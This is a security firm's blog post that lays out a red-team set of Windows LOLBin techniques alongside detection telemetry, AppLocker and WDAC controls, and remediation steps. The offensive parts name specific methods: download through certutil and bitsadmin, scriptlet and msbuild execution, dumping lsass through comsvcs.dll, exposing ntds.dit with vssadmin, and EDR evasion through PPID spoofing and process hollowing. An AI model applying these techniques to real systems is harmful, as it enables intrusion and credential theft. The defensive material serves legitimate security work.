BIPI
BIPI

Living-Off-the-Land Binaries (LOLBins) for Red Teams: A Working Operator Set

Cybersecurity

LOLBins remain the most reliable post-exploitation surface on modern Windows. This guide gives a working operator set drawn from the LOLBAS project, covers detection-aware usage, and pairs each technique with the EDR telemetry it generates and the application control rule that kills it.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 29, 2023 · 12 min read

#lolbins#lolbas#windows#edr#red-team

Why LOLBins still pay

Signed Microsoft binaries are everywhere, allowlisted everywhere, and trusted by most legacy AV. Living off the land bypasses delivery-time detection by avoiding novel binaries altogether. The catch is behaviour-based EDR, which is now the real adversary.

The LOLBAS project as ground truth

  • Maintained catalog of signed Windows binaries abused in the wild.
  • Each entry includes ATT&CK mapping and detection notes.
  • Use the JSON feed to keep your operator playbooks current.

Execution: the workhorse trio

  1. rundll32.exe for DLL execution under a trusted parent.
  2. regsvr32.exe scrobj for scriptlet execution, classic Squiblydoo.
  3. msbuild.exe for inline XML build files that execute C# at runtime.

Download: trusted transfer

  • certutil.exe -urlcache for direct HTTP fetch, noisy but signed.
  • bitsadmin.exe for asynchronous transfer that survives session changes.
  • curl.exe shipped with modern Windows, lean and obvious.

Persistence under the radar

  1. schtasks.exe with a payload triggered by user login.
  2. Wmic.exe with event subscription for fileless persistence.
  3. Registry Run keys created via reg.exe with a benign-looking value name.

Credential access

  • comsvcs.dll MiniDump function called via rundll32 for lsass capture.
  • wmic process call create for stealthy execution that bypasses some EDR hooks.
  • vssadmin for shadow copy creation that exposes ntds.dit on domain controllers.

Detection-aware patterns

  • Set realistic parent processes via process hollowing or PPID spoofing.
  • Avoid characteristic command-line strings, EDR vendors hash and lookup.
  • Pace operations so you do not light up beacon timing analytics.

Telemetry your client should collect

  1. Sysmon with the SwiftOnSecurity baseline plus tuning for LOLBAS entries.
  2. EDR rules from MITRE ATT&CK that map to T1218 sub-techniques.
  3. Process command-line logging via group policy.

Application control that actually kills LOLBins

  • AppLocker rules that block rundll32, regsvr32, and msbuild for non-IT users.
  • Windows Defender Application Control policies with explicit publisher rules.
  • Constrained Language Mode for PowerShell in user contexts.

Operator hygiene

  • Never reuse the same LOLBin technique twice in one engagement.
  • Pair every download primitive with a different execution primitive.
  • Document the EDR sensor you bypassed, with version, for the report.
72
LOLBAS entries actively useful
81%
Engagements where rundll32 works
23%
Clients with AppLocker enforced
The binary is signed by Microsoft, the behaviour is signed by you. EDR can only see one of those clearly.

Remediation, ordered by effort

  1. Enable application control in audit mode and harvest baseline.
  2. Move to enforce on a pilot ring of standardised workstations.
  3. Layer behavioural EDR rules tuned to your environment.
  4. Roll Constrained Language Mode and signed-script-only PowerShell across the fleet.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.